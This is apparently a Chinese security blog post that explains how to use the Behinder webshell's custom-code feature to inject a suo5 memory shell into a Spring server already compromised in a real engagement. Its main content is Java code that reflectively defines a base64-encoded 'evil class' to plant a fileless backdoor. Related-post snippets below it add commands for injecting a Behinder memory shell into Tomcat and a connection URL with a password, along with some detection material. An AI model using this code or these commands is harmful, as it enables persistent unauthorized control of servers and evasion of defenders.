[技术分享]冰蝎自定义代码注入内存马

最新推荐文章于 2025-07-14 17:57:24 发布
原创 最新推荐文章于 2025-07-14 17:57:24 发布 · 1.4k 阅读 · 6 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#java #开发语言 #安全 #内存马

该文章已生成可运行项目,

如果觉得该文章有帮助的,麻烦师傅们可以搜索下微信公众号:良月安全。点个关注,感谢师傅们的支持。

免责声明

本博客所发布的所有内容,包括但不限于信息、工具、项目以及文章,均旨在提供学习与研究之用。所有工具安全性自测。如因此产生的一切不良后果与文章作者和本公众号无关。如有涉及公司与个人敏感信息,侵权烦请告知,我们会立即删除并致歉。

前言

一次实战中,spring 环境,通过代码执行漏洞打入了冰蝎内存马,但是发现之后漏洞接口被打环了,执行不成功,并且目标不出网,这时候就想到了通过冰蝎的自定义代码功能注入 suo5 内存马。

自定义代码注入

点击冰蝎自定义代码功能,可以看到已经有了示例的代码,这个代码功能就是输出 hello world。

ServletOutputStream so = ((ServletResponse) Response).getOutputStream();
so.write("hello world".getBytes("UTF-8"));
so.flush();
so.close();

fillContext 方法是用来设置 Request、Response、Session 的。

我们只要在equals函数中嵌入注入内存马的代码就行了,可以参考如下链接通过反射类加载字节码来注入内存马。

[java学习]反射类加载字节码

jdk 版本可以在冰蝎的基本信息中看到,jdk 版本过高的话需要更改反射类加载字节码的代码。

参考代码

高版本 jdk 不适用。

import javax.servlet.ServletOutputStream;
import javax.servlet.ServletRequest;
import javax.servlet.ServletResponse;
import javax.servlet.http.HttpSession;
import javax.servlet.jsp.PageContext;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;
import java.lang.reflect.Method;
import java.util.Base64;


public class Test {

    private Object Request;
    private Object Response;
    private Object Session;


    @Override
    public boolean equals(Object obj) {

        try {
            fillContext(obj);
            String evilClassBase64 = "{{base64ClassBytes}}";
            byte[] bytes = Base64.getDecoder().decode(evilClassBase64);
            Method method = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
            method.setAccessible(true);
            Class ccc = (Class) method.invoke(ClassLoader.getSystemClassLoader(), "{{className}}", bytes, new Integer(0), new Integer(bytes.length));
            ccc.newInstance();
            ServletOutputStream so = ((ServletResponse) Response).getOutputStream();
            so.write("inject success".getBytes("UTF-8"));
            so.flush();
            so.close();
        } catch (Exception e) {
            e.printStackTrace();
        }
        return true;
    }



    private void fillContext(Object obj) throws Exception {
        if (obj.getClass().getName().indexOf("PageContext") >= 0) {
            this.Request = obj.getClass().getDeclaredMethod("getRequest", new Class[] {}).invoke(obj);
            this.Response = obj.getClass().getDeclaredMethod("getResponse", new Class[] {}).invoke(obj);
            this.Session = obj.getClass().getDeclaredMethod("getSession", new Class[] {}).invoke(obj);

        } else {
            Map<String, Object> objMap = (Map<String, Object>) obj;
            this.Session = objMap.get("session");
            this.Response = objMap.get("response");
            this.Request = objMap.get("request");
        }
        Response.getClass().getDeclaredMethod("setCharacterEncoding", new Class[] { String.class }).invoke(Response, "UTF-8");

    }
}
本文章已经生成可运行项目
LiangYueSec
关注
[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
杨秀璋的专栏
07-16 2万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了威胁情报分析,通过Python抓取FreeBuf网站“APT”主题的相关文章。这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
[网络安全自学篇] 八十五.《Windows黑客编程技术详解》之注入技术详解(全局钩子、远线程钩子、突破Session 0注入、APC注入
热门推荐
杨秀璋的专栏
06-25 2万+
从这篇文章开始,作者将带着大家来学习《Windows黑客编程技术详解》,其作者是甘迪文老师,推荐大家购买来学习。作者将采用实际编程和图文结合的方式进行分享,并且会进一步补充知识点,希望对您有所帮助。第二篇文章主要介绍4种常见的注入技术,包括全局钩子、远线程钩子、突破SESSION 0隔离的远线程注入、APC注入,案例包括键盘钩子、计算器远线程注入实现、APC注入等,希望对您有所帮助。
spring打入filter内存+冰蝎成功
bring_coco的博客
08-29 2464
注意springboot版本过高注入失败,会报错。springboot版本2.4.5。可以看的spring内存注入成功。fastjson版本1.2.24。我们版本不变,换个内存再打一遍。Test.java内存)可以看到报错了,报错为。
memshell:Tomcat 冰蝎内存
04-13
Tomcat 无文件冰蝎内存 使用以下命令创建tomcat容器,并将inject.jar,agent.jar复制到容器中。 docker run -d -ti --net host --name tomcat tomcat:8.0.18-jre8 docker cp inject.jar tomcat:/usr/local/tomcat docker cp agent.jar tomcat:/usr/local/tomcat 使用以下命令将其注入到tomcat进程中。 java -jar inject.jar 123 通过behinder.jar连接内存冰蝎,url格式: http://ip:port/1.jsp?pass_the_world=123&model=chopper 密码: rebeyond
Behinder-Source:Shell经理Behinder的源代码冰蝎源码,反编译,当前版本3.0 Beta6,支持内存注入
03-23
关于 感谢原作者的技术分享和实践 ,当前反编译版本为Beta6 声明 本项目预测学习,请勿用于非法用途! 测试环境 Win10 + JDK1.8 + IDEA java内存:tomcat7-9,websphere 12.2.1.3.0,wildfly17、21,websphere 20.0.0.12 Liberty 更新 解决连接weblogic时,返回包开头有两个换行,导致一系列问题 添加多种java环境下(tomcat,weblogic,wildfly,websphere),多种内存冰蝎,reGeorg)的支持 添加shell生成菜单 网站文件zip压缩功能(jsp,php,aspx) 启用修改文件可行性功能(jsp,php,aspx) 添加.Net环境下aspx内存的支持 添加壳引入导出功能 php下绕过open_basedir,代码直接用哥斯拉的 感谢
arthas工具排查冰蝎内存
归零者的博客
07-25 1317
大佬的工具,目前最新版本3.7.2。测试需要tomcat8以上。
干货|冰蝎、哥斯拉 内存应急排查
m0_60571990的博客
12-29 1万+
干货|冰蝎、哥斯拉 内存应急排查
玄机———内存分析-冰蝎内存(Filter)
最新发布
2301_76981702的博客
07-14 2147
它主要用于显示当前所有Java进程的PID,这对于了解启动了多少个Java进程非常有用,因为每个Java程序都会占用一个Java虚拟机实例。然而,JPS的一个限制是它只能显示当前用户的进程ID,要查看其他用户的进程ID,则需要使用Linux的ps命令。它是 jar 包生成的时候,自动创建的,主要负责制定 jar 包的 main 文件位置和当前文件夹。JPS命令的基本用法非常简单,可以通过不同的选项来获取更详细的进程信息。jmap 是一种工具,用于打印有关正在运行的 JVM 中的内存的统计信息。
Goby 利用内存中的一些技术细节【技术篇】_内存码流量特征(1)
2401_87197993的博客
09-18 1068
以上部分简单列举了一些实战使用内存技术中所使用的一些技术问题和遇到的一些坑的解决方案,在经过对以上技术的研究和解决后,在实战上快速使用内存基本上就没有什么问题了。虽然我们讨论的是 JavaWeb 内存技术,但实际可以看到,对抗的思路和技术早已经不单单在 Java 层,而是延伸到了 native 层、内存层面。这仍然是实战化利用中的九牛一毛。
shiro 内存_深入利用Shiro反序列化漏洞
weixin_39879674的博客
12-22 3008
0x00:背景​ shiro反序列化RCE是在实战中一个比较高频且舒适的漏洞,shiro框架在java web登录认证中广泛应用,每一次目标较多的情况下几乎都可以遇见shiro,而因其payload本身就是加密的,无攻击特征,所以几乎不会被waf检测和拦截。0x01:shiro反序列化的原理先来看看shiro在1.2.4版本反序列化的原理这里是shiro拿到cookie后的关键代码,先de...
releaseBehinderShell:卸载冰蝎内存
04-16
编译 mvn clean package -DskipTests 使用 首先查看机器进程,找到Tomcat或者Weblogic进程ID,如下为查找Tocmat进程ID ps -el | grep org.apache.catalina.startup.Bootstrap 运行卸载内存程序 java -Xbootclasspath/a:$JAVA_HOME/lib/tools.jar -jar releaseBehinderShell-1.0-SNAPSHOT-jar-with-dependencies.jar [pid] 注意 本工具只在Tomcat环境下进行测试通过,weblogic环境未进行测试。 由于使用本工具导致的任何服务器崩溃等一系列问题,与本人无关。
中间件内存注入&冰蝎连接(附更改部分代码)1
08-03
2. 冰蝎源码简要分析 (JSP) 3. 修改 1. 分析环境准备 2. 冰蝎源码简要分析 (JSP)
Java内存与网络安全技术面试精华
3. 冰蝎和哥斯拉原理:这是针对恶意软件技术提问,可能是某些特定的网络攻击工具或蠕虫病毒,要求了解其工作原理,如基于网络的传播、感染机制等。 4. 实习经历和项目:面试官关注应聘者过去在实习期间的实践操作,...
第20篇:改造冰蝎客户端适配JNDIExploit的内存
ABC_123的博客
08-20 2825
Part1 前言JNDIExploit是一款常用的用于JNDI注入利用的工具,其大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于JNDI反序列化漏洞的利用,可直接对出网情况下的JNDI进行回显。JNDIExploit这款工具注入冰蝎内存是经过改造后的冰蝎,网上并没有改造好的与之适配的冰蝎客户端放出来,原版...
网络安全工具冰蝎4.0内存可运行Web组件版本
SHELLCODE_8BIT的博客
09-15 848
因为内存具有特定行,既指定版本只能在指定的web组件运行,以下是测试情况。
Java闭源调试跟踪捕获冰蝎内存
SHELLCODE_8BIT的博客
03-07 268
2.对其增加-XX:+TraceClassLoading来监听类的新增。1.使用bash -x catalina.sh获得执行的java命令。3.直接使用冰蝎注入即可观察到新增的类对象。
三条命令查杀冰蝎、哥斯拉内存
2401_85280228的博客
03-04 1718
首先我们了解一下内存注入的方法,有两种注入内存的方式:1、动态注入组件2、通过Instrument修改内存class内存姿势多种多样,内存的检测方法同样百花齐放。从上面的分析来说可以总结为“80万对60万,优势在我”是攻方,比如通过三条命令发现内存,发现的只是已有的特征,攻方也可以修改这些特征,所以还需要另辟蹊径。笔者找到一个在实验环境表现不错的第二个新方法,等实践不错后再分享出来。
查杀支持对冰蝎V3.0 Beta 7检测,无需更新!
chennqqi的专栏
04-10 586
最近发现冰蝎新增了内存注入,用河查杀试了一下,可以直接检出冰蝎V3.0 Beta 7 ,各位参加重保的安服小伙伴和管理员朋友们无需升级,可以直接使用。检测效果如下图,发现5个后门下载河...
学习了解内存,看这篇就够了!(精华版)
MachineGunJoe666
06-21 1万+
目录 介绍: 一、内存简介 1.1 webshell变迁 1.2 如何实现webshell内存 1.3 内存类型 二、背景知识 2.1 Java web三大件 2.2Tomcat 2.3 其他java背景知识 三、内存实现 四、内存检测与排查 4.1源码检测 4.2 内存排查 介绍: 内存,也被称为无文件,是无文件攻击的一种常用手段。虽然由来已久,但是在此之前并未“大红大紫”。近年来盛行于攻防演练之中,攻防演练从2016年的几家参演单位,到2020年扩充到..
冰蝎内存流量特征
04-28
### 冰蝎内存的网络流量特征及其检测与防御 #### 1. 加密通信机制 冰蝎内存的核心特点是采用AES对称加密技术进行数据传输,且加密密钥由随机数函数动态生成[^1]。这意味着每次会话使用的密钥都不同,从而增加了流量分析和解码的难度。 #### 2. 密钥协商过程的变化 早期版本的冰蝎在建立连接时会有两次明文的密钥协商过程,这成为了一些WAF设备识别的关键点。然而,从3.0版本起,冰蝎取消了这一过程,改为直接使用预共享密钥或其他方式完成初始化[^1]。此改动使得传统的基于密钥协商行为的检测手段失效。 #### 3. HTTP请求头特性 尽管冰蝎尝试隐藏其身份,但在实际操作中仍保留某些特定模式: - **User-Agent字段**:默认情况下,冰蝎会选择一组固定的老旧浏览器标识作为User-Agent值[^1]。虽然用户可以选择自定义UA字符串以规避探测,但这仍然是一个潜在弱点。 - **Cookie和其他头部参数**:有时会在请求中携带特殊的cookie名称或者格式化的header项用于维持session状态等目的[^2]。 #### 4. 数据包结构特点 对于上传阶段而言,由于整个payload完全驻留在RAM里而不落地磁盘上,因此传统依赖于扫描物理文件的技术难以奏效。不过,在初始部署期间可能仍然能够观察到异常活动比如非正常的大尺寸POST提交动作等等[^3]。 #### 5. 综合策略建议 针对上述提到的各种可能性,可以从以下几个方面着手构建更有效的防护体系: - 实施深度包解析(DPI),重点审查那些表现出不寻常行为模式(如重复访问相同资源却带有不同的post body内容) 的链接; - 利用机器学习模型训练出区分良性和恶意样本的能力,进而降低误判率的同时提高准确性; - 定期更新签名库以便及时应对新出现变种威胁; ```python import re from scapy.all import * def detect_behinder_traffic(packet): if packet.haslayer(TCP) and packet[TCP].dport == 80: payload = str(packet[TCP].payload) # Check for common User-Agents used by Behinder user_agents = ["Mozilla/4.0 (compatible; MSIE 6.0;", "Dalvik/"] if any(re.search(user_agent, payload) for user_agent in user_agents): return True # Look for other suspicious patterns such as specific headers or POST sizes ... return False ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值